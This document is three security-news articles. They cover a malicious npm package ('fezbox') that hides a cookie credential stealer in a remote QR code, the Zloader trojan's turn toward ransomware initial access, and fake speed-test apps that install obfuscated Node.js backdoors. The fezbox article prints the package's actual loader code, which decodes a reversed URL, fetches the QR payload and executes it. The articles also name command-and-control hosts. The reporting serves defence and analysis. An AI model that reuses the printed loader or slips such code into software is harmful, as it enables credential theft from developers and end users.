A sophisticated malware campaign has emerged in the npm ecosystem, utilizing an innovative steganographic technique to conceal malicious code within QR codes.

The malicious package, identified as “fezbox,” presents itself as a legitimate JavaScript/TypeScript utility library while secretly executing password-stealing operations through a cleverly disguised QR code payload.

This attack represents a significant evolution in supply chain threats, demonstrating how cybercriminals are adopting increasingly creative methods to bypass security measures and evade detection systems.

The fezbox package masquerades as a comprehensive utility library offering TypeScript support, performance optimization, and modular functionality.

According to its documentation, the package provides common helper functions organized by feature modules, allowing developers to import only necessary components.

While the README file mentions a QR Code Module for generating and parsing QR codes, it deliberately omits crucial details about the package’s capability to fetch QR codes from remote URLs and execute embedded malicious code.

Socket.dev analysts identified the malware after detecting suspicious behavioral patterns within the package’s codebase.

The security team discovered multiple layers of obfuscation techniques, including string reversal, code minification, and the novel use of steganographic QR codes to hide the final payload.

At the time of discovery, the malicious package remained active on the npm registry, prompting Socket.dev to petition the npm security team for its immediate removal and the suspension of the threat actor’s account.

Advanced Steganographic Payload Delivery

The malware employs a sophisticated multi-stage execution process that begins with environmental checks and timing delays to evade sandbox detection.

The initial malicious code contains browser-specific conditionals that verify the presence of window and document objects, ensuring execution only occurs in legitimate browser environments.

When conditions are met, the malware waits 120 seconds before initiating the payload retrieval process.

The core malicious functionality revolves around a reversed URL string that conceals the location of the steganographic QR code:-

(function () {
    if (n.isDevelopment() || c.chance(2 / 3))
        return;
    setTimeout(async () => {
        const loader = new d.QRCodeScriptLoader();
        const t = await loader.parseQRCodeFromUrl(
            "gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b/6177675571v/daolpu/egami/qsqbneuhd/moc.yrani"
            .split("")
            .reverse()
            .join("")
        );
        loader.executeCode(t);
    }, 120 * 1e3);
})();

When reversed, this string resolves to a Cloudinary-hosted QR code image containing the final malicious payload. The QR code itself serves as a steganographic container, hiding JavaScript code that extracts username and password values from browser cookies.

Once decoded, the payload attempts to locate cookies containing authentication credentials, specifically searching for “username” and “password” fields using additional string obfuscation techniques.

The extracted credentials are then exfiltrated through an HTTPS POST request to a command-and-control server hosted on Railway, a cloud platform service.

This multi-layered approach – combining environmental evasion, timing delays, string reversal, steganographic concealment, and credential extraction – represents a sophisticated evolution in npm-based supply chain attacks that security teams must prepare to defend against.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code appeared first on Cyber Security News.

Zloader, a sophisticated Zeus-based modular trojan that first emerged in 2015, has undergone a significant transformation from its original banking-focused operations to become a dangerous entry point for ransomware attacks in corporate environments.

Originally designed to facilitate financial fraud, this malware family has evolved into a powerful tool for initial access brokers who specialize in providing cybercriminals with unauthorized entry into target organizations.

After an almost two-year hiatus, Zloader reemerged in September 2023 with substantial enhancements that have made it one of the most concerning threats facing enterprise security teams today.

The malware now features sophisticated obfuscation techniques, advanced anti-analysis capabilities, and improved network communication protocols that enable it to operate stealthily within corporate networks while establishing persistent footholds for subsequent ransomware deployment.

Unlike many other malware families that rely on widespread distribution campaigns, Zloader has adopted a highly targeted approach that focuses on precision rather than volume.

This strategic shift allows threat actors to carefully select high-value corporate targets and customize their attacks for maximum impact.

The malware’s modular architecture enables attackers to deploy additional payloads and tools as needed, making it an ideal platform for multi-stage ransomware operations.

Zloader’s new code obfuscation techniques and the same function after deobfuscation (Source – Zscaler)

Zscaler analysts identified two recent versions of Zloader, specifically 2.11.6.0 and 2.13.7.0, which demonstrate significant improvements in their evasion capabilities and network communication protocols.

These versions have introduced new features that enhance the malware’s ability to perform lateral movement within corporate networks while maintaining persistence and avoiding detection by security solutions.

The malware’s evolution reflects the broader trend of cybercriminals repurposing existing tools for ransomware operations, taking advantage of proven infection vectors and established command-and-control infrastructure to streamline their attack workflows.

Advanced Anti-Analysis and Evasion Techniques

Zloader’s latest iterations have implemented sophisticated anti-analysis mechanisms designed to frustrate security researchers and evade automated detection systems.

One notable enhancement involves the malware’s filename requirements, where previous versions demanded specific hardcoded filenames to execute properly.

The current versions have introduced generic filenames including “Updater.exe” and “Updater.dll,” providing threat actors with greater deployment flexibility while maintaining sandbox evasion capabilities.

The malware employs multiple layers of XOR-based obfuscation that significantly complicate static analysis efforts. Security researchers have developed specialized IDA scripts to handle these obfuscation layers:-

import idautils
XOR_KEY = 0xAE # CHANGE ACCORDINGLY 
FUNCTION_NAME = "Calculate_Int1" # CHANGE ACCORDINGLY
# Iterate through all functions in the IDA database.
for func_addr in Functions():
    func_name = get_func_name(func_addr)
    if func_name.startswith(FUNCTION_NAME): 
        print(f"Processing function: {func_name}")
        # Search for cross-references (xrefs) to the function.
        for xref in idautils.XrefsTo(func_addr):
            print(f"\tFound xref at: {hex(xref.frm)}")
            # Grab the DWORD passed and perform a XOR operation on it.
            param = ida_bytes.get_byte(xref.frm-1) # CHANGE ACCORDINGLY
            result = param ^ XOR_KEY 
            mov_eax_constant = b'\xB8' + result.to_bytes(4, 'little')
            ida_bytes.patch_bytes(xref.frm, mov_eax_constant)
            set_cmt(xref.frm, FUNCTION_NAME, 0)

Perhaps most importantly, Zloader now incorporates process integrity level verification as an additional sandbox detection mechanism.

The malware terminates execution if it detects high-integrity processes, which are commonly used in automated analysis environments.

This behavioral change represents a calculated trade-off where the malware sacrifices elevated system access in exchange for improved stealth capabilities, allowing it to operate undetected in standard user environments where most corporate workstations function.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Zloader Malware Repurposed to Act as Entry Point Into Corporate Environments to Deploy Ransomware appeared first on Cyber Security News.

A sophisticated malware campaign has emerged that leverages fake online speed test applications to deploy obfuscated JavaScript payloads on Windows systems.

These malicious utilities masquerade as legitimate network speed testing tools, manual readers, PDF utilities, and various search frontends to deceive unsuspecting users into installing dangerous code that operates covertly in the background.

The attack begins when users download what appears to be a functional speed testing application from compromised or malicious domains such as onlinespeedtestservice[.]com.

Upon installation, the application delivers its advertised functionality, creating a false sense of security while simultaneously deploying a hidden Node.js runtime environment alongside heavily obfuscated JavaScript files.

The visible executable performs as expected, maintaining the user’s trust while the malicious components establish themselves within the system.

Security Magic analysts identified that these applications are packaged using Inno-Packer installers, which bundle legitimate functionality with malicious components including a portable Node runtime, scheduled task configurations, and obfuscated JavaScript payloads that serve no purpose for the application’s primary function.

The malware operates independently from the main executable, significantly expanding the attack surface and providing threat actors with persistent access to compromised systems.

The infection establishes persistence through scheduled tasks that execute the malicious JavaScript payload approximately every 12 hours.

This JavaScript component maintains encrypted communications with command and control servers, specifically cloud.appusagestats.com, and possesses the capability to execute arbitrary code delivered by remote servers.

The malware queries system information including the Windows registry key HKLM\Software\Microsoft\Cryptography\MachineGuid to gather machine identification data for transmission to attackers.

Advanced Obfuscation and Command Execution Mechanisms

The JavaScript payload employs sophisticated obfuscation techniques that conceal its true purpose from security analysis.

Researchers discovered that the obfuscated code contains encoded strings that can be decoded by patching the return statement of the decode function.

When decoded, the JavaScript reveals its communication protocol with the command and control infrastructure. The malware transmits JSON-formatted data containing version information, system identifiers, and capability flags.

Analysis of network communications shows the payload can receive and execute PowerShell commands, with researchers observing test executions that displayed message boxes through Windows Forms assemblies.

The command execution mechanism utilizes Node.js child_process modules to spawn system processes, enabling arbitrary code execution with user privileges while maintaining stealth through hidden window modes and no-profile PowerShell executions.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Beware of Fake Online Speedtest Application With Obfuscated JS Codes appeared first on Cyber Security News.